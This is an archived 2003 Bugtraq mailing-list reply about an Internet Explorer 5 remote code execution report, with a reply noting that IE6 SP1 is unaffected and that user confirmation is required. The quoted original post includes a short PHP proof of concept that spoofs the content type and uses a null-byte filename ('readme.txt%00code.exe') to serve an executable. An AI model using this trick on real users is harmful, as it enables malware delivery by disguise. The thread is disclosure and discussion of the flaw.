Re: IE remote code execution

From: K-OTiK Security (Special-Alerts_at_k-otik.com)
Date: 10/20/03

  • Next message: Ivan Ristic: "[ANNOUNCE] mod_security 1.7 released"
    Date: 20 Oct 2003 17:01:23 -0000
    To: bugtraq@securityfocus.com
    
    
    ('binary' encoding is not supported, stored as-is) In-Reply-To: <Pine.LNX.4.44.0310190012380.170-100000@osiris>

    Hi,

    NO effect on :

    Internet Explorer 6 SP1 (Windows XP)
    Internet Explorer 6 For Windows 2003 Server

    The user MUST accept to execute the file by clicking "YES", so it's not more dangerous than a direct link to an .exe file ...

    Regards.

    K-OTik Staff /// http://www.k-otik.com

    >From: Marcin Ulikowski <r3b00t@tx.pl>
    >Subject: IE remote code execution
    >
    >This code can execute any code remotely using IE - as you can see very simple.
    >
    >// for IE 5, tested on default Windows 98SE installation
    ><?php
    >Header("Content-type: audio/midi");
    >Header("Content-Disposition: inline; filename=readme.txt%00code.exe");
    >readfile("code.exe");
    >?>
    ><noscript>
    >


  • Next message: Ivan Ristic: "[ANNOUNCE] mod_security 1.7 released"

    Relevant Pages

    • Re: Cannot Logon
      ... Regards, ... Microsoft MVP [Windows] ... |I have a Windows 2000 file server running SP4 that lets Administrators ... | logging the active console user off remotely, ...
      (microsoft.public.win2000.general)
    • Re: Duplicate C drives
      ... It does if he has dynamic disks. ... Regards, ... > Microsoft MVP [Windows] ... The server has no errros in the ...
      (microsoft.public.win2000.advanced_server)
    • Re: COM not available on Windows 2003 server
      ... Regards, ... Microsoft MVP [Windows] ... The same software we tried to install on ... | local Windows 2003 server and the option is available. ...
      (microsoft.public.windows.server.general)
    • Re: Internet Server space question?
      ... >that everyone who makes a account could upload it to the server and they can ... >only access the server by the website. ... is this a setting in IIS or Windows 2003 Server or just Windows XP ... >My best regards ...
      (microsoft.public.inetserver.iis.ftp)
    • Re: Setup is Very Slow
      ... Regards ... >If you booted from a DOS network disk and then attached ... >> I am installing Windows Server 2003 from a distribution ... >> have also had the same problem with Windows XP? ...
      (microsoft.public.windows.server.setup)